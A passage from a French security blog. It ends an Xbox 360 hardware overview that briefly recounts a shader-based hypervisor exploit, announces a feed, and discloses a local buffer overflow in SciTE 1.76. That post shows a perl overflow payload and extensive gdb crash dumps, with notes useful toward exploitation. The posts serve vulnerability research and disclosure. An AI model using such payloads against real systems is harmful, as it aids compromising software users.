<br /></p> <p dir="ltr" style="text-align: left;"></p> <p dir="ltr" style="text-align: left;"></p> <p></p> <p></p> <p></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> <span style="font-style: italic;">128 Registres</span>:</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Les 32 premiers mappés aux 32 registres(enregistreurs) qui existent dans la génération précédente</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> de processeurs PowerPC(pour la compatibilité binaire) .</p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">A ce processeur triple coeur viennent s'ajouter les 2 coprocesseur vectoriels (relatif aux données) VMX128 (similaires à AltiVec) avec 2 bancs de registres (128×128 bit) pour chaque coeur.(VMX128 Bits doubles coeurs)</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">L'utilisateur a en outre la possibilité d'utiliser l'ensemble des registres normaux fournis par le PowerPC et les 32 registres vectoriels fournis par VMX de manière simultanée.</p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">(jeu de 32 registres vectoriels 128 bits permettent alors de stocker 16 entiers 8 bits signés ou non signés, 8 entiers 16 bits signés ou non signés, 4 entiers 32 bits signés ou non signés ou bien 4 nombre réels 32-bit en virgule flottantes)</p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(255, 204, 102); font-weight: bold;">[*] Sécurité :</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Les concepts de sécurité sont identiques à ceux définis sur l'architecture POWER (contrôle des accès au niveau des segments et des pages).</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> La séparation superviseur / utilisateur se fait au niveau des segments ou des blocs. Chaque processus utilisateur dispose de 16 segments dont deux sont réservés au noyau (accessible en mode superviseur). </p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> À noter cependant qu'il est possible d'effectuer des accès à la mémoire qui ne supportent aucun contrôle. Il suffit pour cela de désactiver tous les mécanismes de traduction d'adresses. </p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">ROM (et SRAM de 64 kbytes) contenant le programme de démarrage Secure Bootloader de Microsoft, et un Hyperviseur de cryptage pour générer des clés</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">de chiffrement aléatoire.</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Ce meme Hyperviseur a pu permettre par exemple une exploitation </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">(il y en a eu d'autres, et d'autre sont a l'etude)</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> via une injection au travers de shaders de jeu (King Kong) , permettant ainsi d'executer du code arbitraire directement en mode kernel .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">En effet , les vectors shaders utilises benefient d'un acces a la memoire non controles .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">(Ce jeu utilise des shaders compilés avec Microsoft D3DX9 Shader Compiler 9.04.91.0000)</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Pour ce faire , Crawler360 (la super crapule :P) a du convertir son code en shader puis developper un petit loader utilisable par le port de serie .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Malheureusement , les MaJ du kernel vers la version 4552 (ou superieure) bloquent les tentatives de Downgrades et donc l'exploitation de cette vulnerabilitee de l'Hyperviseur .</p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);">Neanmoins , d''autre exploitations de ce type restent a envisager (et font l'objet de recherche active) .</p> <p style="color: rgb(204, 204, 204);"> Voila , la petite presentation de la Xbox 360 est maintenant finie , j'espere que ça pourra servir a d'autres , n'hésitez pas a partager vos idées/trouvailles , c'est important .</p><p style="color: rgb(204, 204, 204);">See you ..
<br /></p><p style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 204, 102);font-size:85%;" >/--------------- RESSOURCES UTILES ---------------\</span></p><ul><li><a href="http://fr.wikipedia.org/wiki/SIMD">Simd</a></li><li><a href="http://fr.wikipedia.org/wiki/SIMD"></a><a href="http://fr.wikipedia.org/wiki/Shader">Shaders</a></li><li><a href="http://fr.wikipedia.org/wiki/SIMD"></a><a href="http://www.free60.org/Main_Page">Free60</a></li><li><a href="http://fr.wikipedia.org/wiki/SIMD"></a><a href="http://x360.gx-mod.com/modules/news/">x60</a></li><li><a href="http://fr.wikipedia.org/wiki/SIMD"></a><a href="http://www.ibm.fr">ibm</a>
<br /></li></ul><span style="color: rgb(51, 51, 255);"><span style="font-size:85%;"><a href="http://www.blogger.com/www.ibm.fr/"></a></span></span><p></p> </div> kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-1689959854254620652010-08-01T14:26:00.003+02:002010-08-01T14:31:36.238+02:00flux now avaible<span style="color: rgb(204, 204, 204);">Salut a tous!</span><br /><br /><span style="color: rgb(204, 204, 204);">Etant donné que je compte balancer pas mal d'anneries ici dans les mois a venir, j'ai décidé de lancer mon flux afin de se tenir informé de l'activitée du blog .</span><br /><br /><span style="color: rgb(204, 204, 204);">Pour ceux que ça intéresse:</span> <a href="http://feeds.feedburner.com/KmkzsBlog">link</a><br /><br /><span style="color: rgb(204, 204, 204);">A trés bientot ;-)</span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-20312527477265733772010-07-05T22:47:00.000+02:002010-07-12T07:29:18.910+02:00[*] Scite Text Editor 1.76 PoC : Local BoF vulnerability ( 0 - Days )<span style="color: rgb(192, 192, 192);">Me revoila :P</span>
<br />
<br />
<br /><span style="color: rgb(192, 192, 192);">Je sais que j'ai pas mal zappé ce blog depuis quelques mois , néanmoins j'espere pouvoir m'y remettre entre 2 CTF ..</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">Bref, osef d'ma vie , place a la présentation , certe rapide , mais néanmoins simpa (bien que trés trés incomplete ) du Buffer Overflow que j'ai eu l'occasion de</span>
<br /><span style="color: rgb(192, 192, 192);">découvrir dans la version 1.76 de Scite text Editor .</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">L'environnement d'audit est un</span> <span style="color: rgb(255, 0, 0);">2.6.31-22</span> <span style="color: rgb(192, 192, 192);">, néanmoins , les essais effectués sur des versions antérieures donne d'autres résultats assez surprenant .</span>
<br /><span style="color: rgb(192, 192, 192);"> Cet article ne présentera qu'uniquement quelques dumps démontrant la vulnérabilité sans pour autant l'exploiter; l'exploitation aparaitra ici peu etre d'ici pas mal de temps , j'y reviendrait.</span>
<br />
<br />
<br /><span style="color: rgb(192, 192, 192);">Place a quelques dumps issus de</span> <span style="color: rgb(255, 0, 0);">GNU gdb (GDB) 7.0</span>
<br />
<br /><span style="color: rgb(255, 153, 0);">r `perl -e'print"A"x4096 . "\x90\x90\x90\x90"'`</span>
<br /><span style="color: rgb(255, 153, 0);">Starting program: /usr/bin/scite `perl -e'print"A"x4096 . "\x90\x90\x90\x90"'`</span>
<br /><span style="color: rgb(255, 0, 0);">[Thread debugging using libthread_db enabled]</span>
<br /><span style="color: rgb(255, 0, 0);">*** buffer overflow detected ***: /usr/bin/scite terminated</span>
<br /><span style="color: rgb(255, 0, 0);">======= Backtrace: =========</span>
<br /><span style="color: rgb(255, 0, 0);">/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0x9c7008]</span>
<br /><span style="color: rgb(255, 0, 0);">/lib/tls/i686/cmov/libc.so.6[0x9c6040]</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">/lib/tls/i686/cmov/libc.so.6(__strcpy_chk+0x44)[0x9c53b4] </span>
<br />
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x8082a71]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x8083751]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x805b59c]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x8079382]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x8070944]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x805dc32]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x805dd8a]</span>
<br /><span style="color: rgb(255, 0, 0);">/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0x8fcb56]</span>
<br /><span style="color: rgb(255, 0, 0);">/usr/bin/scite[0x8052d41]</span>
<br /><span style="color: rgb(255, 0, 0);">======= Memory map: ========</span>
<br /><span style="color: rgb(255, 0, 0);">00110000-0012b000 r-xp 00000000 08:01 146 /lib/ld-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">0012b000-0012c000 r--p 0001a000 08:01 146 /lib/ld-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">0012c000-0012d000 rw-p 0001b000 08:01 146 /lib/ld-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">0012d000-0012e000 r-xp 00000000 00:00 0 [vdso]</span>
<br /><span style="color: rgb(255, 0, 0);">0012e000-004e6000 r-xp 00000000 08:01 262811 /usr/lib/libgtk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">004e6000-004e7000 ---p 003b8000 08:01 262811 /usr/lib/libgtk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">004e7000-004eb000 r--p 003b8000 08:01 262811 /usr/lib/libgtk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">004eb000-004ed000 rw-p 003bc000 08:01 262811 /usr/lib/libgtk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">004ed000-004ef000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">004ef000-00581000 r-xp 00000000 08:01 262814 /usr/lib/libgdk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">00581000-00583000 r--p 00092000 08:01 262814 /usr/lib/libgdk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">00583000-00584000 rw-p 00094000 08:01 262814 /usr/lib/libgdk-x11-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">00584000-0059f000 r-xp 00000000 08:01 263706 /usr/lib/libatk-1.0.so.0.2809.1</span>
<br /><span style="color: rgb(255, 0, 0);">0059f000-005a0000 r--p 0001b000 08:01 263706 /usr/lib/libatk-1.0.so.0.2809.1</span>
<br /><span style="color: rgb(255, 0, 0);">005a0000-005a1000 rw-p 0001c000 08:01 263706 /usr/lib/libatk-1.0.so.0.2809.1</span>
<br /><span style="color: rgb(255, 0, 0);">005a1000-005b9000 r-xp 00000000 08:01 262816 /usr/lib/libgdk_pixbuf-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">005b9000-005ba000 r--p 00017000 08:01 262816 /usr/lib/libgdk_pixbuf-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">005ba000-005bb000 rw-p 00018000 08:01 262816 /usr/lib/libgdk_pixbuf-2.0.so.0.1800.3</span>
<br /><span style="color: rgb(255, 0, 0);">005bb000-005c6000 r-xp 00000000 08:01 264322 /usr/lib/libpangocairo-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">005c6000-005c7000 r--p 0000a000 08:01 264322 /usr/lib/libpangocairo-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">005c7000-005c8000 rw-p 0000b000 08:01 264322 /usr/lib/libpangocairo-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">005c8000-0060e000 r-xp 00000000 08:01 264320 /usr/lib/libpango-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">0060e000-0060f000 r--p 00045000 08:01 264320 /usr/lib/libpango-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">0060f000-00610000 rw-p 00046000 08:01 264320 /usr/lib/libpango-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">00610000-00687000 r-xp 00000000 08:01 262362 /usr/lib/libcairo.so.2.10800.8</span>
<br /><span style="color: rgb(255, 0, 0);">00687000-00689000 r--p 00076000 08:01 262362 /usr/lib/libcairo.so.2.10800.8</span>
<br /><span style="color: rgb(255, 0, 0);">00689000-0068a000 rw-p 00078000 08:01 262362 /usr/lib/libcairo.so.2.10800.8</span>
<br /><span style="color: rgb(255, 0, 0);">0068a000-006c6000 r-xp 00000000 08:01 263053 /usr/lib/libgobject-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006c6000-006c7000 r--p 0003b000 08:01 263053 /usr/lib/libgobject-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006c7000-006c8000 rw-p 0003c000 08:01 263053 /usr/lib/libgobject-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006c8000-006cb000 r-xp 00000000 08:01 263054 /usr/lib/libgmodule-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006cb000-006cc000 r--p 00002000 08:01 263054 /usr/lib/libgmodule-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006cc000-006cd000 rw-p 00003000 08:01 263054 /usr/lib/libgmodule-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006cd000-006cf000 r-xp 00000000 08:01 268014 /lib/tls/i686/cmov/libdl-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006cf000-006d0000 r--p 00001000 08:01 268014 /lib/tls/i686/cmov/libdl-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006d0000-006d1000 rw-p 00002000 08:01 268014 /lib/tls/i686/cmov/libdl-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006d1000-006d5000 r-xp 00000000 08:01 263055 /usr/lib/libgthread-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006d5000-006d6000 r--p 00003000 08:01 263055 /usr/lib/libgthread-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006d6000-006d7000 rw-p 00004000 08:01 263055 /usr/lib/libgthread-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">006d7000-006de000 r-xp 00000000 08:01 268027 /lib/tls/i686/cmov/librt-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006de000-006df000 r--p 00006000 08:01 268027 /lib/tls/i686/cmov/librt-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006df000-006e0000 rw-p 00007000 08:01 268027 /lib/tls/i686/cmov/librt-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">006e0000-00795000 r-xp 00000000 08:01 972 /lib/libglib-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00795000-00796000 r--p 000b4000 08:01 972 /lib/libglib-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00796000-00797000 rw-p 000b5000 08:01 972 /lib/libglib-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00797000-0087d000 r-xp 00000000 08:01 262987 /usr/lib/libstdc++.so.6.0.13</span>
<br /><span style="color: rgb(255, 0, 0);">0087d000-00881000 r--p 000e6000 08:01 262987 /usr/lib/libstdc++.so.6.0.13</span>
<br /><span style="color: rgb(255, 0, 0);">00881000-00882000 rw-p 000ea000 08:01 262987 /usr/lib/libstdc++.so.6.0.13</span>
<br /><span style="color: rgb(255, 0, 0);">00882000-00889000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">00889000-008ad000 r-xp 00000000 08:01 268015 /lib/tls/i686/cmov/libm-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008ad000-008ae000 r--p 00023000 08:01 268015 /lib/tls/i686/cmov/libm-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008ae000-008af000 rw-p 00024000 08:01 268015 /lib/tls/i686/cmov/libm-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008af000-008cb000 r-xp 00000000 08:01 546 /lib/libgcc_s.so.1</span>
<br /><span style="color: rgb(255, 0, 0);">008cb000-008cc000 r--p 0001b000 08:01 546 /lib/libgcc_s.so.1</span>
<br /><span style="color: rgb(255, 0, 0);">008cc000-008cd000 rw-p 0001c000 08:01 546 /lib/libgcc_s.so.1</span>
<br /><span style="color: rgb(255, 0, 0);">008cd000-008e2000 r-xp 00000000 08:01 268025 /lib/tls/i686/cmov/libpthread-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008e2000-008e3000 r--p 00014000 08:01 268025 /lib/tls/i686/cmov/libpthread-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008e3000-008e4000 rw-p 00015000 08:01 268025 /lib/tls/i686/cmov/libpthread-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">008e4000-008e6000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">008e6000-00a24000 r-xp 00000000 08:01 265728 /lib/tls/i686/cmov/libc-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">00a24000-00a25000 ---p 0013e000 08:01 265728 /lib/tls/i686/cmov/libc-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">00a25000-00a27000 r--p 0013e000 08:01 265728 /lib/tls/i686/cmov/libc-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">00a27000-00a28000 rw-p 00140000 08:01 265728 /lib/tls/i686/cmov/libc-2.10.1.so</span>
<br /><span style="color: rgb(255, 0, 0);">00a28000-00a2b000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">00a2b000-00b55000 r-xp 00000000 08:01 263622 /usr/lib/libX11.so.6.2.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b55000-00b56000 ---p 0012a000 08:01 263622 /usr/lib/libX11.so.6.2.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b56000-00b57000 r--p 0012a000 08:01 263622 /usr/lib/libX11.so.6.2.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b57000-00b59000 rw-p 0012b000 08:01 263622 /usr/lib/libX11.so.6.2.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b59000-00b5a000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">00b5a000-00b5c000 r-xp 00000000 08:01 263633 /usr/lib/libXcomposite.so.1.0.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b5c000-00b5d000 r--p 00001000 08:01 263633 /usr/lib/libXcomposite.so.1.0.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b5d000-00b5e000 rw-p 00002000 08:01 263633 /usr/lib/libXcomposite.so.1.0.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b5e000-00b60000 r-xp 00000000 08:01 263637 /usr/lib/libXdamage.so.1.1.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b60000-00b61000 rw-p 00001000 08:01 263637 /usr/lib/libXdamage.so.1.1.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b61000-00b65000 r-xp 00000000 08:01 263643 /usr/lib/libXfixes.so.3.1.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b65000-00b66000 r--p 00003000 08:01 263643 /usr/lib/libXfixes.so.3.1.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b66000-00b67000 rw-p 00004000 08:01 263643 /usr/lib/libXfixes.so.3.1.0</span>
<br /><span style="color: rgb(255, 0, 0);">00b67000-00bfa000 r-xp 00000000 08:01 263056 /usr/lib/libgio-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00bfa000-00bfb000 r--p 00092000 08:01 263056 /usr/lib/libgio-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00bfb000-00bfc000 rw-p 00093000 08:01 263056 /usr/lib/libgio-2.0.so.0.2200.3</span>
<br /><span style="color: rgb(255, 0, 0);">00bfc000-00bfd000 rw-p 00000000 00:00 0</span>
<br /><span style="color: rgb(255, 0, 0);">00bfd000-00c24000 r-xp 00000000 08:01 264324 /usr/lib/libpangoft2-1.0.so.0.2600.0</span>
<br /><span style="color: rgb(255, 0, 0);">Program received signal SIGABRT, Aborted.</span>
<br /><span style="color: rgb(255, 0, 0);">0x0012d422 in __kernel_vsyscall ()</span>
<br />
<br /><a href="http://membres.multimania.fr/profil4/kmkz/Exploits/Capture_audit_scite1.png"><span style="color: rgb(204, 204, 204);">Screen </span></a>
<br />
<br />
<br /><span style="color: rgb(255, 0, 0);">0x0012d000 // VDSO</span> <span style="color: rgb(192, 192, 192);">, ça peut etre utile dans le cas de certaines exploitation</span>
<br />
<br />
<br />
<br /><span style="color: rgb(255, 0, 0);">(gdb) x/79s $eip</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d422 <>: </span><incomplete sequence="" 303="">
<br /><span style="color: rgb(255, 0, 0);">0x12d424: ".shstrtab"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d42e: ".hash"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d434: ".dynsym"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d43c: ".dynstr"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d444: ".gnu.version"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d451: ".gnu.version_d"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d460: ".note"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d466: ".eh_frame_hdr"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d474: ".eh_frame"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d47e: ".dynamic"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d487: ".data"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d48d: ".text"</span>
<br /><span style="color: rgb(255, 0, 0);">0x12d493: ""</span>
<br />
<br />
<br /><span style="color: rgb(192, 192, 192);">Comme on peux le constater , le programme est stoppé brutalement suite a un débordement de tampon ,</span>
<br /><span style="color: rgb(192, 192, 192);">essayons donc d'y voir plus clair :</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">(gdb) i stack</span>
<br /><span style="color: rgb(255, 0, 0);">#0 0x0012d422 in __kernel_vsyscall ()</span>
<br /><span style="color: rgb(255, 0, 0);">#1 0x009104d1 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64</span>
<br /><span style="color: rgb(255, 0, 0);">#2 0x00913932 in *__GI_abort () at abort.c:92</span>
<br /><span style="color: rgb(255, 0, 0);">#3 0x00946fc5 in __libc_message (do_abort=2,</span>
<br /><span style="color: rgb(255, 0, 0);"> fmt=0xa0881d "*** %s ***: %s terminated\n")</span>
<br /><span style="color: rgb(255, 0, 0);"> at ../sysdeps/unix/sysv/linux/libc_fatal.c:189</span>
<br /><span style="color: rgb(255, 0, 0);">#4 0x009c7008 in *__GI___fortify_fail (msg=0xa087c7 "buffer overflow detected")</span>
<br /><span style="color: rgb(255, 0, 0);"> at fortify_fail.c:32</span>
<br /><span style="color: rgb(255, 0, 0);">#5 0x009c6040 in *__GI___chk_fail () at chk_fail.c:29</span>
<br /><span style="color: rgb(255, 0, 0);">#6 0x009c536a in __strcat_chk (</span>
<br /><span style="color: rgb(255, 0, 0);"> dest=0xbfff4734 "/home/kmkz/0Days/Scite_1.76/", 'A' </span><se src="0x833c1f0" home="" kmkz="" 0days="" 76="" a=""><se destlen="0)" at="" 51="" 7="" 0x08074043="" 8="" 0x08078fc6="" 9="" 0x08079349="" 10="" 0x08070944="" 11="" 0x0805dc32="" 12="" 0x0805dd8a="" 13="" 0x008fcb56="" in="" __libc_start_main="" main="0x805dca1," argc="2," ubp_av="0xbfffb524," init="0x8106380," fini="0x8106370," rtld_fini="0x11dd20"><span style="color: rgb(255, 0, 0);"><_dl_fini>,</span>
<br /><span style="color: rgb(255, 0, 0);"> stack_end=0xbfffb51c) at libc-start.c:220</span>
<br /><span style="color: rgb(255, 0, 0);">#14 0x08052d41 in ?? ()</span>
<br />
<br />
<br /><span style="color: rgb(255, 0, 0);">(gdb) i auxv</span>
<br /><span style="color: rgb(255, 0, 0);">32 AT_SYSINFO Special system info/entry points 0x12d420</span>
<br /><span style="color: rgb(255, 0, 0);">33 AT_SYSINFO_EHDR System-supplied DSO's ELF header 0x12d000</span>
<br /><span style="color: rgb(255, 0, 0);">16 AT_HWCAP Machine-dependent CPU capability hints 0xbfebf3ff</span>
<br /><span style="color: rgb(255, 0, 0);">6 AT_PAGESZ System page size 4096</span>
<br /><span style="color: rgb(255, 0, 0);">17 AT_CLKTCK Frequency of times() 100</span>
<br /><span style="color: rgb(255, 0, 0);">3 AT_PHDR Program headers for program 0x8048034</span>
<br /><span style="color: rgb(255, 0, 0);">4 AT_PHENT Size of program header entry 32</span>
<br /><span style="color: rgb(255, 0, 0);">5 AT_PHNUM Number of program headers 9</span>
<br /><span style="color: rgb(255, 0, 0);">7 AT_BASE Base address of interpreter 0x110000</span>
<br /><span style="color: rgb(255, 0, 0);">8 AT_FLAGS Drapeaux 0x0</span>
<br /><span style="color: rgb(255, 0, 0);">9 AT_ENTRY Entry point of program 0x8052d20</span>
<br /><span style="color: rgb(255, 0, 0);">11 AT_UID Real user ID 1000</span>
<br /><span style="color: rgb(255, 0, 0);">12 AT_EUID Effective user ID 1000</span>
<br /><span style="color: rgb(255, 0, 0);">13 AT_GID Real group ID 1000</span>
<br /><span style="color: rgb(255, 0, 0);">14 AT_EGID Effective group ID 1000</span>
<br /><span style="color: rgb(255, 0, 0);">23 AT_SECURE Boolean, was exec setuid-like? 0</span>
<br />
<br /><span style="color: rgb(51, 255, 255);">25 AT_RANDOM Address of 16 random bytes 0xbfffb66b --> allons voir ce cet offset contient</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">31 AT_EXECFN File name of executable 0xbfffffed "/usr/bin/scite"</span>
<br /><span style="color: rgb(255, 0, 0);">15 AT_PLATFORM String identifying platform 0xbfffb67b "i686"</span>
<br /><span style="color: rgb(255, 0, 0);">0 AT_NULL End of vector 0x0</span>
<br />
<br />
<br /><span style="color: rgb(255, 0, 0);">(gdb) x/48x 0xbfffb66b</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb66b: 0x8a29b215 0x563d86b0 0xe525c77b 0x1a1921ee</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb67b: 0x36383669 0x00000000 0x00000000 0x7273752f</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb68b: 0x6e69622f 0x6963732f 0x41006574 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb69b: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6ab: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6bb: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6cb: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6db: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6eb: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb6fb: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb70b: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbfffb71b: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">...</span>
<br />
<br /><span style="color: rgb(192, 192, 192);">Nos "A"</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">...</span>
<br />
<br /><span style="color: rgb(255, 0, 0);">0xbffff66b: 0x41414141 0x41414141 0x41414141 0x41414141</span>
<br /><span style="color: rgb(255, 0, 0);">0xbffff67b: 0x41414141 0x41414141 0x41414141 0x41414141</span>
